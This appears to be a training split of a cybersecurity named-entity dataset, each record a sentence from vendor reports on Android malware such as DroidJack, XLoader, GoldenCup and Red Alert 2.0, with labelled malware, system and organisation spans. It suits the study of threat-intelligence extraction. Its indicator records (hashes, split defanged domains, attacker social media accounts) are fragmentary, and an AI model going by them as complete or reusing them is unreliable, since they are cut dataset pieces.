{"text": "A few days back , we wrote about an Android Marcher trojan variant posing as the Super Mario Run game for Android .", "spans": {"SYSTEM: Android": [[36, 43], [106, 113]], "MALWARE: Marcher": [[44, 51]], "SYSTEM: Super Mario Run": [[81, 96]]}, "info": {"id": "cyner_train_000001", "source": "cyner_train"}} {"text": "We have found another instance of malware posing as the Super Mario Run Android app , and this time it has taken the form of DroidJack RAT ( remote access trojan ) .", "spans": {"SYSTEM: Super Mario Run": [[56, 71]], "SYSTEM: Android": [[72, 79]], "MALWARE: DroidJack RAT": [[125, 138]]}, "info": {"id": "cyner_train_000002", "source": "cyner_train"}} {"text": "The authors are trying to latch onto the popularity of the Super Mario Run game to target eagerly waiting Android users .", "spans": {"SYSTEM: Super Mario Run": [[59, 74]], "SYSTEM: Android": [[106, 113]]}, "info": {"id": "cyner_train_000004", "source": "cyner_train"}} {"text": "Details : Name : Super Mario Run Package Name : net.droidjack.server MD5 : 69b4b32e4636f1981841cbbe3b927560 Technical Analysis : The malicious package claims to be the Super Mario Run game , as shown in the permissions screenshot below , but in reality this is a malicious RAT called DroidJack ( also known as SandroRAT ) that is getting installed .", "spans": {"SYSTEM: Super Mario Run": [[17, 32], [168, 183]], "MALWARE: DroidJack": [[284, 293]], "MALWARE: SandroRAT": [[310, 319]]}, "info": {"id": "cyner_train_000005", "source": "cyner_train"}} {"text": "Once installed , the RAT registers the infected device as shown below .", "spans": {}, "info": {"id": "cyner_train_000006", "source": "cyner_train"}} {"text": "DroidJack RAT starts capturing sensitive information like call data , SMS data , videos , photos , etc .", "spans": {"MALWARE: DroidJack RAT": [[0, 13]]}, "info": {"id": "cyner_train_000007", "source": "cyner_train"}} {"text": "This RAT records all the calls and stores the recording to an “ .amr ” file .", 
"spans": {}, "info": {"id": "cyner_train_000009", "source": "cyner_train"}} {"text": "Here , the RAT stores all the captured videos in a “ video.3gp ” file .", "spans": {}, "info": {"id": "cyner_train_000011", "source": "cyner_train"}} {"text": "Upon further inspection , we have observed that this RAT extracts WhatsApp data too .", "spans": {"SYSTEM: WhatsApp": [[66, 74]]}, "info": {"id": "cyner_train_000013", "source": "cyner_train"}} {"text": "The following are the DBs created and maintained by the RAT .", "spans": {}, "info": {"id": "cyner_train_000015", "source": "cyner_train"}} {"text": "We saw the following hardcoded C & C server location in the RAT package : Conclusion : The DroidJack RAT is another example of a growing trend in which malware authors seek to exploit public interest as a way to spread malware .", "spans": {"MALWARE: DroidJack RAT": [[91, 104]]}, "info": {"id": "cyner_train_000016", "source": "cyner_train"}} {"text": "As a reminder , it is always a good practice to download apps only from trusted app stores such as Google Play .", "spans": {"SYSTEM: Google Play": [[99, 110]]}, "info": {"id": "cyner_train_000018", "source": "cyner_train"}} {"text": "By : Hara Hiroaki , Lilang Wu , Lorin Wu April 02 , 2019 In previous attacks , XLoader posed as Facebook , Chrome and other legitimate applications to trick users into downloading its malicious app .", "spans": {"MALWARE: XLoader": [[79, 86]], "SYSTEM: Facebook": [[96, 104]], "SYSTEM: Chrome": [[107, 113]]}, "info": {"id": "cyner_train_000021", "source": "cyner_train"}} {"text": "Trend Micro researchers found a new variant that uses a different way to lure users .", "spans": {"ORGANIZATION: Trend Micro": [[0, 11]]}, "info": {"id": "cyner_train_000022", "source": "cyner_train"}} {"text": "Aside from a change in its deployment techniques , a few changes in its code set it apart from its previous versions .", "spans": {}, "info": {"id": "cyner_train_000024", "source": "cyner_train"}} {"text": "This 
newest variant has been labeled XLoader version 6.0 ( detected as AndroidOS_XLoader.HRXD ) , following the last version discussed in a previous research on the malware family .", "spans": {"MALWARE: XLoader": [[37, 44]]}, "info": {"id": "cyner_train_000025", "source": "cyner_train"}} {"text": "Infection chain The threat actors behind this version used several fake websites as their host — copying that of a Japanese mobile phone operator ’ s website in particular — to trick users into downloading the fake security Android application package ( APK ) .", "spans": {"SYSTEM: Android": [[224, 231]]}, "info": {"id": "cyner_train_000026", "source": "cyner_train"}} {"text": "Monitoring efforts on this new variant revealed that the malicious websites are spread through smishing .", "spans": {}, "info": {"id": "cyner_train_000027", "source": "cyner_train"}} {"text": "The infection has not spread very widely at the time of writing , but we ’ ve seen that many users have already received its SMS content .", "spans": {}, "info": {"id": "cyner_train_000028", "source": "cyner_train"}} {"text": "However , successfully installing this malicious APK requires that the user has allowed the installation of such apps as controlled in the Unknown Sources settings .", "spans": {}, "info": {"id": "cyner_train_000032", "source": "cyner_train"}} {"text": "The infection chain is slightly more roundabout in the case of Apple devices .", "spans": {"SYSTEM: Apple": [[63, 68]]}, "info": {"id": "cyner_train_000034", "source": "cyner_train"}} {"text": "If the user installs the profile , the malicious website will open , revealing it to be an Apple phishing site , as seen in figure 2 .", "spans": {"ORGANIZATION: Apple": [[91, 96]]}, "info": {"id": "cyner_train_000040", "source": "cyner_train"}} {"text": "However , as mentioned earlier , an analysis of this new variant showed some changes in its code in line with its new deployment method .", "spans": {}, "info": {"id": "cyner_train_000042", 
"source": "cyner_train"}} {"text": "We discuss these changes and its effect on Android and Apple devices .", "spans": {"SYSTEM: Android": [[43, 50]], "SYSTEM: Apple": [[55, 60]]}, "info": {"id": "cyner_train_000043", "source": "cyner_train"}} {"text": "Malicious APK Like its previous versions , XLoader 6.0 abuses social media user profiles to hide its real C & C addresses , but this time its threat actors chose the social media platform Twitter , which was never used in previous attacks .", "spans": {"MALWARE: XLoader 6.0": [[43, 54]], "ORGANIZATION: Twitter": [[188, 195]]}, "info": {"id": "cyner_train_000044", "source": "cyner_train"}} {"text": "The real C & C address is encoded in the Twitter names , and can only be revealed once decoded .", "spans": {"ORGANIZATION: Twitter": [[41, 48]]}, "info": {"id": "cyner_train_000045", "source": "cyner_train"}} {"text": "Version 6.0 also adds a command called “ getPhoneState ” , which collects unique identifiers of mobile devices such as IMSI , ICCID , Android ID , and device serial number .", "spans": {"SYSTEM: Android": [[134, 141]]}, "info": {"id": "cyner_train_000048", "source": "cyner_train"}} {"text": "This addition is seen in Figure 5 .", "spans": {}, "info": {"id": "cyner_train_000049", "source": "cyner_train"}} {"text": "Malicious iOS profile In the case of Apple devices , the downloaded malicious iOS profile gathers the following : Unique device identifier ( UDID ) International Mobile Equipment Identity ( IMEI ) Integrated Circuit Card ID ( ICCID ) Mobile equipment identifier ( MEID ) Version number Product number The profile installations differ depending on the iOS .", "spans": {"SYSTEM: iOS": [[10, 13], [78, 81], [351, 354]], "SYSTEM: Apple": [[37, 42]]}, "info": {"id": "cyner_train_000051", "source": "cyner_train"}} {"text": "For versions 11.0 and 11.4 , the installation is straightforward .", "spans": {}, "info": {"id": "cyner_train_000052", "source": "cyner_train"}} {"text": "If a user visits the profile 
host website and allows the installer to download , the iOS system will go directly to the “ Install Profile ” page ( which shows a verified safety certificate ) , and then request the users ’ passcode for the last step of installation .", "spans": {"SYSTEM: iOS": [[85, 88]]}, "info": {"id": "cyner_train_000053", "source": "cyner_train"}} {"text": "On later versions , specifically iOS 12.1.1 and iOS 12.2 , the process is different .", "spans": {"SYSTEM: iOS 12.1.1": [[33, 43]], "SYSTEM: iOS 12.2": [[48, 56]]}, "info": {"id": "cyner_train_000054", "source": "cyner_train"}} {"text": "After the profile is downloaded , the iOS system will first ask users to review the profile in their settings if they want to install it .", "spans": {"SYSTEM: iOS": [[38, 41]]}, "info": {"id": "cyner_train_000055", "source": "cyner_train"}} {"text": "The phishing site uses the gathered information as its GET parameter , allowing the attacker to access the stolen information .", "spans": {}, "info": {"id": "cyner_train_000060", "source": "cyner_train"}} {"text": "The \" porn kr sex '' APK connects to a malicious website that runs XLoader in the background .", "spans": {"MALWARE: XLoader": [[67, 74]]}, "info": {"id": "cyner_train_000062", "source": "cyner_train"}} {"text": "This attack , however , seems exclusive to Android users , as it does not have the code to attack iOS devices .", "spans": {"SYSTEM: Android": [[43, 50]], "SYSTEM: iOS": [[98, 101]]}, "info": {"id": "cyner_train_000064", "source": "cyner_train"}} {"text": "Succeeding monitoring efforts revealed a newer variant that exploits the social media platforms Instagram and Tumblr instead of Twitter to hide its C & C address .", "spans": {"ORGANIZATION: Instagram": [[96, 105]], "ORGANIZATION: Tumblr": [[110, 116]], "ORGANIZATION: Twitter": [[128, 135]]}, "info": {"id": "cyner_train_000065", "source": "cyner_train"}} {"text": "We labeled this new variant XLoader version 7.0 , because of the different deployment method and its use 
of the native code to load the payload and hide in Instagram and Tumblr profiles .", "spans": {"MALWARE: XLoader": [[28, 35]], "ORGANIZATION: Instagram": [[156, 165]], "ORGANIZATION: Tumblr": [[170, 176]]}, "info": {"id": "cyner_train_000066", "source": "cyner_train"}} {"text": "These more recent developments indicate that XLoader is still evolving .", "spans": {"MALWARE: XLoader": [[45, 52]]}, "info": {"id": "cyner_train_000067", "source": "cyner_train"}} {"text": "The emergence of XLoader 6.0 does not only indicate that the threat actors behind it remain active ; it also holds fresh evidence of its connection to FakeSpy .", "spans": {"MALWARE: XLoader 6.0": [[17, 28]], "MALWARE: FakeSpy": [[151, 158]]}, "info": {"id": "cyner_train_000069", "source": "cyner_train"}} {"text": "It had again cloned a different legitimate Japanese website to host its malicious app , similar to what FakeSpy had also done before .", "spans": {"MALWARE: FakeSpy": [[104, 111]]}, "info": {"id": "cyner_train_000071", "source": "cyner_train"}} {"text": "Their similarity is made more apparent by looking at their naming method for downloadable files , domain structure of fake websites and other details of their deployment techniques , exemplified in figure 10 .", "spans": {}, "info": {"id": "cyner_train_000072", "source": "cyner_train"}} {"text": "XLoader 6.0 also mirrors the way FakeSpy hides its real C & C server .", "spans": {"MALWARE: XLoader 6.0": [[0, 11]], "MALWARE: FakeSpy": [[33, 40]]}, "info": {"id": "cyner_train_000073", "source": "cyner_train"}} {"text": "When before it had used several different social media platforms , it now uses the Twitter platform , something FakeSpy has done in its past attacks .", "spans": {"ORGANIZATION: Twitter": [[83, 90]], "MALWARE: FakeSpy": [[112, 119]]}, "info": {"id": "cyner_train_000074", "source": "cyner_train"}} {"text": "Analysis of the malicious iOS profile also revealed further connections , as the profile can also be downloaded from a website 
that FakeSpy deployed early this year .", "spans": {"SYSTEM: iOS": [[26, 29]], "MALWARE: FakeSpy": [[132, 139]]}, "info": {"id": "cyner_train_000075", "source": "cyner_train"}} {"text": "This newest entry seems to indicate that these changes won ’ t be stopping soon .", "spans": {}, "info": {"id": "cyner_train_000077", "source": "cyner_train"}} {"text": "Being aware of this fact can help create defensive strategies , as well as prepare for upcoming attacks .", "spans": {}, "info": {"id": "cyner_train_000078", "source": "cyner_train"}} {"text": "In addition , just as uncovering new characteristics is important , finding ones we ’ ve also seen in a different malware family like FakeSpy also provides valuable insight .", "spans": {"MALWARE: FakeSpy": [[134, 141]]}, "info": {"id": "cyner_train_000079", "source": "cyner_train"}} {"text": "Perhaps more information on XLoader will be known in the future .", "spans": {"MALWARE: XLoader": [[28, 35]]}, "info": {"id": "cyner_train_000081", "source": "cyner_train"}} {"text": "For now , users can make the best of the knowledge they have now to significantly reduce the effectivity of such malware .", "spans": {}, "info": {"id": "cyner_train_000082", "source": "cyner_train"}} {"text": "Users of iOS can remove the malicious profile using the Apple Configurator 2 , Apple ’ s official iOS helper app for managing Apple devices .", "spans": {"SYSTEM: iOS": [[9, 12], [98, 101]], "ORGANIZATION: Apple": [[56, 61], [79, 84], [126, 131]]}, "info": {"id": "cyner_train_000083", "source": "cyner_train"}} {"text": "Following simple best practices , like strictly downloading applications or any files from trusted sources and being wary of unsolicited messages , can also prevent similar attacks from compromising devices .", "spans": {}, "info": {"id": "cyner_train_000084", "source": "cyner_train"}} {"text": "Indicators of Compromise SHA256 Package App label 332e68d865009d627343b89a5744843e3fde4ae870193f36b82980363439a425 ufD.wykyx.vlhvh SEX kr 
porn 403401aa71df1830d294b78de0e5e867ee3738568369c48ffafe1b15f3145588 ufD.wyjyx.vahvh 佐川急便 466dafa82a4460dcad722d2ad9b8ca332e9a896fc59f06e16ebe981ad3838a6b", "spans": {}, "info": {"id": "cyner_train_000085", "source": "cyner_train"}} {"text": "com.dhp.ozqh Facebook 5022495104c280286e65184e3164f3f248356d065ad76acef48ee2ce244ffdc8 ufD.wyjyx.vahvh Anshin Scan a0f3df39d20c4eaa410a61a527507dbc6b17c7f974f76e13181e98225bda0511 com.aqyh.xolo 佐川急便 cb412b9a26c1e51ece7a0e6f98f085e1c27aa0251172bf0a361eb5d1165307f7", "spans": {"ORGANIZATION: Facebook": [[13, 21]]}, "info": {"id": "cyner_train_000086", "source": "cyner_train"}} {"text": "jp.co.sagawa.SagawaOfficialApp 佐川急便 Malicious URLs : hxxp : //38 [ .", "spans": {}, "info": {"id": "cyner_train_000087", "source": "cyner_train"}} {"text": "] com hxxp : //apple-icloud [ .", "spans": {}, "info": {"id": "cyner_train_000092", "source": "cyner_train"}} {"text": "] com/ hxxp : //files.spamo [ .", "spans": {}, "info": {"id": "cyner_train_000096", "source": "cyner_train"}} {"text": "] com hxxp : //mailsa-qau [ .", "spans": {}, "info": {"id": "cyner_train_000099", "source": "cyner_train"}} {"text": "] com hxxp : //mailsa-qaw [ .", "spans": {}, "info": {"id": "cyner_train_000100", "source": "cyner_train"}} {"text": "] com hxxp : //mailsa-wqq [ .", "spans": {}, "info": {"id": "cyner_train_000104", "source": "cyner_train"}} {"text": "] com hxxp : //mailsa-wqw [ .", "spans": {}, "info": {"id": "cyner_train_000106", "source": "cyner_train"}} {"text": "] com hxxp : //nttdocomo-qae [ .", "spans": {}, "info": {"id": "cyner_train_000107", "source": "cyner_train"}} {"text": "] com hxxp : //nttdocomo-qat [ .", "spans": {}, "info": {"id": "cyner_train_000111", "source": "cyner_train"}} {"text": "] com hxxp : //nttdocomo-qaw [ .", "spans": {}, "info": {"id": "cyner_train_000112", "source": "cyner_train"}} {"text": "] com/ hxxp : //www [ .", "spans": {}, "info": {"id": "cyner_train_000114", "source": "cyner_train"}} {"text": "] com hxxp : //www [ 
.", "spans": {}, "info": {"id": "cyner_train_000116", "source": "cyner_train"}} {"text": "] com Malicious Twitter accounts : https : //twitter.com/lucky88755 https : //twitter.com/lucky98745 https : //twitter.com/lucky876543 https : //twitter.com/luckyone1232 https : //twitter.com/sadwqewqeqw https : //twitter.com/gyugyu87418490 https : //twitter.com/fdgoer343 https : //twitter.com/sdfghuio342 https : //twitter.com/asdqweqweqeqw https : //twitter.com/ukenivor3", "spans": {"ORGANIZATION: Twitter": [[16, 23]]}, "info": {"id": "cyner_train_000124", "source": "cyner_train"}} {"text": "Malicious Instagram account : https : //www.instagram.com/freedomguidepeople1830/ Malicious Tumblr accounts : https : //mainsheetgyam.tumblr.com/ https : //hormonaljgrj.tumblr.com/ https : //globalanab.tumblr.com/ C & C addresses : 104 [ .", "spans": {"ORGANIZATION: Instagram": [[10, 19]], "ORGANIZATION: Tumblr": [[92, 98]]}, "info": {"id": "cyner_train_000125", "source": "cyner_train"}} {"text": "] 132:28855 GoldenCup : New Cyber Threat Targeting World Cup Fans As the World Cup launches , so does a new threat Officials from the Israeli Defense Force recently uncovered an Android Spyware campaign targeting Israeli soldiers and orchestrated by \" Hamas .", "spans": {"MALWARE: GoldenCup": [[12, 21]], "ORGANIZATION: Israeli Defense Force": [[134, 155]], "SYSTEM: Android": [[178, 185]], "ORGANIZATION: Hamas": [[252, 257]]}, "info": {"id": "cyner_train_000155", "source": "cyner_train"}} {"text": "'' The latest samples attributed to this campaign were discovered by security researchers from ClearSky .", "spans": {"ORGANIZATION: ClearSky": [[95, 103]]}, "info": {"id": "cyner_train_000156", "source": "cyner_train"}} {"text": "In our research , we focus on the most recent sample , an application dubbed as \" Golden Cup '' , launched just before the start of World Cup 2018 .", "spans": {"MALWARE: Golden Cup": [[82, 92]]}, "info": {"id": "cyner_train_000157", "source": "cyner_train"}} {"text": 
"Distribution / Infection When this campaign started at the start of 2018 , the malware ( \" GlanceLove '' , \" WinkChat '' ) was distributed by the perpetrators mainly via fake Facebook profiles , attempting to seduce IDF soldiers to socialize on a different platform ( their malware ) .", "spans": {"MALWARE: GlanceLove": [[91, 101]], "MALWARE: WinkChat": [[109, 117]], "SYSTEM: Facebook": [[175, 183]]}, "info": {"id": "cyner_train_000158", "source": "cyner_train"}} {"text": "As this approach was not a great success , their last attempt was to quickly create a World Cup app and this time distribute it to Israeli citizens , not just soldiers .", "spans": {}, "info": {"id": "cyner_train_000159", "source": "cyner_train"}} {"text": "The short URL redirects to the application page at Google Play .", "spans": {"SYSTEM: Google Play": [[51, 62]]}, "info": {"id": "cyner_train_000161", "source": "cyner_train"}} {"text": "We assume it was rushed because , unlike GlanceLove , it lacked any real obfuscation .", "spans": {"MALWARE: GlanceLove": [[41, 51]]}, "info": {"id": "cyner_train_000164", "source": "cyner_train"}} {"text": "Even the C & C server side was mostly exposed with the file listing available for everyone to traverse through it .", "spans": {}, "info": {"id": "cyner_train_000165", "source": "cyner_train"}} {"text": "It contained approximately 8GB of stolen data .", "spans": {}, "info": {"id": "cyner_train_000166", "source": "cyner_train"}} {"text": "A recent whois of “ goldncup.com ” .", "spans": {}, "info": {"id": "cyner_train_000167", "source": "cyner_train"}} {"text": "In addition , it collects identifiers and some data from the device .", "spans": {}, "info": {"id": "cyner_train_000173", "source": "cyner_train"}} {"text": "After getting a command from the C & C , the app is able to download a malicious payload in the form of a .dex file that is being dynamically loaded adding the additional malicious capabilities .", "spans": {}, "info": {"id": 
"cyner_train_000174", "source": "cyner_train"}} {"text": "In this way , the malware authors can submit their app and add the malicious capabilities only after their app is live on the Play Store .", "spans": {"SYSTEM: Play Store": [[126, 136]]}, "info": {"id": "cyner_train_000175", "source": "cyner_train"}} {"text": "Initiating the MQTT client .", "spans": {}, "info": {"id": "cyner_train_000177", "source": "cyner_train"}} {"text": "The app connects to the MQTT broker with hardcoded username and password and a unique device identifier generated for each device .", "spans": {}, "info": {"id": "cyner_train_000180", "source": "cyner_train"}} {"text": "The MQTT connection to broker The MQTT connection to broker The MQTT communication is used primarily to update the device state and get commands from the C & C .", "spans": {}, "info": {"id": "cyner_train_000181", "source": "cyner_train"}} {"text": "It uses different topics that include the unique device identifier , which side is sending the message , and whether it is information message or command .", "spans": {}, "info": {"id": "cyner_train_000182", "source": "cyner_train"}} {"text": "HTTP Communication In addition to the MQTT communication , the app also uses plain text HTTP communication in order to download the .dex file and upload collected data .", "spans": {}, "info": {"id": "cyner_train_000183", "source": "cyner_train"}} {"text": "All of the files that are being uploaded or downloaded are zip files encrypted by AES with ECB mode .", "spans": {}, "info": {"id": "cyner_train_000184", "source": "cyner_train"}} {"text": "The key for each file is generated randomly and stored in the encrypted file with a fixed offset .", "spans": {}, "info": {"id": "cyner_train_000185", "source": "cyner_train"}} {"text": "In order to upload the file , the app uses a basic REST communication with the server , checking if the file exists and uploading it if it isn ’ t .", "spans": {}, "info": {"id": "cyner_train_000186", "source": 
"cyner_train"}} {"text": "The path that is used for the uploads is : http : // /apps/d/p/op.php The communication looks like this : First Phase The first phase of the app ’ s attack flow collects device information and a list of apps installed on the device .", "spans": {}, "info": {"id": "cyner_train_000187", "source": "cyner_train"}} {"text": "The collection of basic device information .", "spans": {}, "info": {"id": "cyner_train_000189", "source": "cyner_train"}} {"text": "In addition , at this stage the app can process one of these commands : • Collect device info • Install app • Is online ?", "spans": {}, "info": {"id": "cyner_train_000191", "source": "cyner_train"}} {"text": "• Change server domain Out of these , the most interesting command is the “ install app ” command that downloads an encrypted zip file containing the second phase dex file , unpacks and loads it .", "spans": {}, "info": {"id": "cyner_train_000192", "source": "cyner_train"}} {"text": "Second Phase The second phase dex file contains 3 main services that are being used : • ConnManager - handles connections to the C & C • ReceiverManager - waits for incoming calls / app installations • TaskManager - manages the data collection tasks The C & C server address is different than the one that is used by the first phase , so the app reconnects to the new server as well as starts the periodic data collector tasks .", "spans": {}, "info": {"id": "cyner_train_000193", "source": "cyner_train"}} {"text": "By analyzing the TaskManager class we can see the new commands that are supported at this stage : As can be seen in the code snippet above , there are quite a lot of data collection tasks that are now available : Collect device info Track location Upload contacts information Upload sent and received SMS messages Upload images Upload video files Send recursive dirlist of the external storage Upload specific files Record audio using the microphone Record calls Use the camera to capture bursts of 
snapshots Those tasks can either run periodically , on event ( such as incoming call ) or when getting", "spans": {}, "info": {"id": "cyner_train_000194", "source": "cyner_train"}} {"text": "a command from the C & C server .", "spans": {}, "info": {"id": "cyner_train_000195", "source": "cyner_train"}} {"text": "Mitigations Stay protected from mobile malware by taking these precautions : Do not download apps from unfamiliar sites Only install apps from trusted sources Pay close attention to the permissions requested by apps Install a suitable mobile security app , such as SEP Mobile or Norton , to protect your device and data Keep your operating system up to date Make frequent backups of important data Indicators of Compromise ( IoCs ) Package names : anew.football.cup.world.com.worldcup com.coder.glancelove com.winkchat APK SHA2 : 166f3a863bb2b66bda9c76dccf9529d5237f6394721f46635b053870eb2fcc5a", "spans": {}, "info": {"id": "cyner_train_000196", "source": "cyner_train"}} {"text": "b45defca452a640b303288131eb64c485f442aae0682a3c56489d24d59439b47 d9601735d674a9e55546fde0bffde235bc5f2546504b31799d874e8c31d5b6e9 2ce54d93510126fca83031f9521e40cd8460ae564d3d927e17bd63fb4cb20edc 67b1a1e7b505ac510322b9d4f4fc1e8a569d6d644582b588faccfeeaa4922cb7", "spans": {}, "info": {"id": "cyner_train_000197", "source": "cyner_train"}} {"text": "1664cb343ee830fa94725fed143b119f7e2351307ed0ce04724b23469b9002f2 Loaded DEX SHA2 : afaf446a337bf93301b1d72855ccdd76112595f6e4369d977bea6f9721edf37e Domain/IP : goldncup [ .", "spans": {}, "info": {"id": "cyner_train_000198", "source": "cyner_train"}} {"text": "] com glancelove [ .", "spans": {}, "info": {"id": "cyner_train_000199", "source": "cyner_train"}} {"text": "] com autoandroidup [ .", "spans": {}, "info": {"id": "cyner_train_000200", "source": "cyner_train"}} {"text": "] website mobilestoreupdate [ .", "spans": {}, "info": {"id": "cyner_train_000201", "source": "cyner_train"}} {"text": "] website updatemobapp [ .", "spans": {}, "info": 
{"id": "cyner_train_000202", "source": "cyner_train"}} {"text": "] 147 Red Alert 2.0 : Android Trojan targets security-seekers A malicious , counterfeit version of a VPN client for mobile devices targets security-minded victims with a RAT .", "spans": {"MALWARE: Red Alert 2.0": [[6, 19]], "SYSTEM: Android": [[22, 29]], "SYSTEM: VPN": [[101, 104]]}, "info": {"id": "cyner_train_000209", "source": "cyner_train"}} {"text": "Written by Jagadeesh Chandraiah JULY 23 , 2018 SophosLabs has uncovered a mobile malware distribution campaign that uses advertising placement to distribute the Red Alert Trojan , linking counterfeit branding of well-known apps to Web pages that deliver an updated , 2.0 version of this bank credential thief .", "spans": {"ORGANIZATION: SophosLabs": [[47, 57]], "MALWARE: Red Alert Trojan": [[161, 177]]}, "info": {"id": "cyner_train_000210", "source": "cyner_train"}} {"text": "The group distributing this family of malware decorates it in the branding and logos of well-known social media or media player apps , system update patches , or ( in its most recent campaign ) VPN client apps in an attempt to lure users into downloading , installing , and elevating the privileges of a Trojanized app hosted on a site not affiliated with any reputable app market or store .", "spans": {"SYSTEM: VPN": [[194, 197]]}, "info": {"id": "cyner_train_000211", "source": "cyner_train"}} {"text": "Aside from the inescapable irony of disguising a security-reducing Trojan as an ostensibly security-enhancing app , and the righteous affront to the whole concept of a VPN ’ s purpose a Trojan so disguised inspires , this represents an escalation in the variety of app types targeted by this campaign of bankbots in disguise .", "spans": {}, "info": {"id": "cyner_train_000212", "source": "cyner_train"}} {"text": "Red Alert Plays Dress-Up In the wild , we found Web pages designed to ( vaguely ) resemble legitimate app market pages , hosting files for download that have been disguised 
as a legitimate mobile application of moderately broad appeal , such as a media player or social media app .", "spans": {"MALWARE: Red Alert": [[0, 9]]}, "info": {"id": "cyner_train_000213", "source": "cyner_train"}} {"text": "But the categories targeted by this group seem to be broadening with the inclusion of VPN software .", "spans": {"SYSTEM: VPN": [[86, 89]]}, "info": {"id": "cyner_train_000214", "source": "cyner_train"}} {"text": "The Web page shown here on the left is hosted on a domain that seems apt : free-vpn [ .", "spans": {}, "info": {"id": "cyner_train_000215", "source": "cyner_train"}} {"text": "In addition to “ Free VPN Master Android , ” we ’ ve observed Red Alert 2.0 Trojans in the wild disguising themselves using names like : Flash Player or Update Flash Player Android Update or Android Antivirus Chrome Update or Google Update Update Google Market WhatsApp Viber OneCoin Wallet Pornhub Tactic FlashLight or PROFlashLight Finanzonline The vast majority of in-the-wild Red Alert 2.0 samples falsely present themselves as Adobe Flash player for Android , a utility that Adobe stopped supporting years ago .", "spans": {"SYSTEM: Free VPN Master Android": [[17, 40]], "MALWARE: Red Alert 2.0": [[62, 75]], "SYSTEM: Flash Player": [[137, 149]], "SYSTEM: Update Flash Player": [[153, 172]], "SYSTEM: Android Update": [[173, 187]], "SYSTEM: Android Antivirus": [[191, 208]], "SYSTEM: Chrome Update": [[209, 222]], "SYSTEM: Google Update": [[226, 239]], "SYSTEM: Update Google Market": [[240, 260]], "SYSTEM: WhatsApp": [[261, 269]], "SYSTEM: Viber": [[270, 275]], "SYSTEM: OneCoin": [[276, 283]], "SYSTEM: Wallet": [[284, 290]], "MALWARE: Red Alert 2.0 samples": [[380, 401]], "SYSTEM: Adobe Flash player": [[432, 450]], "SYSTEM: Android": [[455, 462]], "ORGANIZATION: Adobe": [[480, 485]]}, "info": {"id": "cyner_train_000220", "source": "cyner_train"}} {"text": "The Red Alert Payload Once installed , the malware requests Device Administrator privileges .", "spans": 
{"MALWARE: Red Alert Payload": [[4, 21]]}, "info": {"id": "cyner_train_000222", "source": "cyner_train"}} {"text": "The Trojan works by creating an overlay whenever the user launches the banking application .", "spans": {}, "info": {"id": "cyner_train_000226", "source": "cyner_train"}} {"text": "Currently Running Applications Banking Trojans that rely on the overlay mechanism to steal information need to know what application is in the foreground .", "spans": {}, "info": {"id": "cyner_train_000227", "source": "cyner_train"}} {"text": "To prevent this , Android ’ s engineers regularly release updates that contain bug fixes designed to prevent apps from getting the list of currently running apps without explicit permission .", "spans": {"SYSTEM: Android": [[18, 25]]}, "info": {"id": "cyner_train_000230", "source": "cyner_train"}} {"text": "With every Android update , the malware authors are forced to come up with new tricks .", "spans": {"SYSTEM: Android": [[11, 18]]}, "info": {"id": "cyner_train_000231", "source": "cyner_train"}} {"text": "This particular case is not an exception .", "spans": {}, "info": {"id": "cyner_train_000232", "source": "cyner_train"}} {"text": "The author ( s ) of this malware wrote separate subroutines that identify the operating system version and fire off methods to obtain a list of currently running applications known to work on that particular version of Android .", "spans": {"SYSTEM: Android": [[219, 226]]}, "info": {"id": "cyner_train_000233", "source": "cyner_train"}} {"text": "If that doesn ’ t work , they try to use queryUsageStats : When the malware invokes queryUsageStats , it asks for the list of applications that ran in the last 1 million milliseconds ( 16 minutes and 40 seconds ) .", "spans": {}, "info": {"id": "cyner_train_000235", "source": "cyner_train"}} {"text": "String Resources Used to Store App Data Red Alert 2.0 stores its data in an atypical location ( inside the Strings.xml file embedded in the app ) to fetch its 
critical data , such as the C2 address .", "spans": {"MALWARE: Red Alert 2.0": [[40, 53]]}, "info": {"id": "cyner_train_000236", "source": "cyner_train"}} {"text": "It ’ s been SophosLabs ’ observation that Red Alert Trojans usually have a randomized internal name like this .", "spans": {"MALWARE: Red Alert Trojans": [[42, 59]]}, "info": {"id": "cyner_train_000238", "source": "cyner_train"}} {"text": "The strings section of the app contains embedded command-and-control IP addresses , ports , and domain names in plaintext .", "spans": {}, "info": {"id": "cyner_train_000239", "source": "cyner_train"}} {"text": "The malware can execute a variety of arbitrary commands , including ( for example ) intercepting or sending text messages without the user ’ s knowledge , obtaining a copy of the victim ’ s Address Book , or call or text message logs , or sending phone network feature codes ( also known as USSD codes ) .", "spans": {"SYSTEM: Address Book": [[190, 202]]}, "info": {"id": "cyner_train_000241", "source": "cyner_train"}} {"text": "C2 and Targeted Banks As described earlier , the C2 domain is kept in the app ’ s resources .", "spans": {}, "info": {"id": "cyner_train_000242", "source": "cyner_train"}} {"text": "During the app execution , the malware contacts C2 domain for further instructions .", "spans": {}, "info": {"id": "cyner_train_000243", "source": "cyner_train"}} {"text": "Most of the network traffic we ’ ve observed is HTTP .", "spans": {}, "info": {"id": "cyner_train_000244", "source": "cyner_train"}} {"text": "The C2 address , as stored in samples we ’ ve seen , comprise both an IP address and port number ; So far , all the samples we ’ ve tested attempted to contact an IP address on port 7878/tcp .", "spans": {}, "info": {"id": "cyner_train_000245", "source": "cyner_train"}} {"text": "Static analysis of the code reveals that the malware downloads the overlay template to use against any of the bank ( s ) it is targeting .", "spans": {}, "info": {"id": 
"cyner_train_000247", "source": "cyner_train"}} {"text": "The malware also sends regular telemetry back to its C2 server about the infected device in the form of an HTTP POST to its C2 server .", "spans": {}, "info": {"id": "cyner_train_000248", "source": "cyner_train"}} {"text": "It uses the base Dalvik User-Agent string for the device it ’ s running on .", "spans": {}, "info": {"id": "cyner_train_000249", "source": "cyner_train"}} {"text": "The content of the HTTP POST data is telemetry data in a json format about the device the malware is running on .", "spans": {}, "info": {"id": "cyner_train_000250", "source": "cyner_train"}} {"text": "The list of banks targeted by Red Alert 2.0 includes NatWest , Barclays , Westpac , and Citibank .", "spans": {"MALWARE: Red Alert 2.0": [[30, 43]], "ORGANIZATION: Barclays": [[63, 71]]}, "info": {"id": "cyner_train_000251", "source": "cyner_train"}} {"text": "We expect to see more diversification in the social engineering lures this threat group employs as time goes on .", "spans": {}, "info": {"id": "cyner_train_000253", "source": "cyner_train"}} {"text": "So far , legitimate app stores appear to be this malware ’ s Achilles heel ; disabling the installation of third-party apps has been an effective prevention measure .", "spans": {}, "info": {"id": "cyner_train_000254", "source": "cyner_train"}} {"text": "Sophos detects all the samples of this Trojan family as Andr/Banker-GWC and Andr/Spybot-A .", "spans": {"ORGANIZATION: Sophos": [[0, 6]]}, "info": {"id": "cyner_train_000256", "source": "cyner_train"}} {"text": "In the wild , these are only distributed as a direct download from unofficial 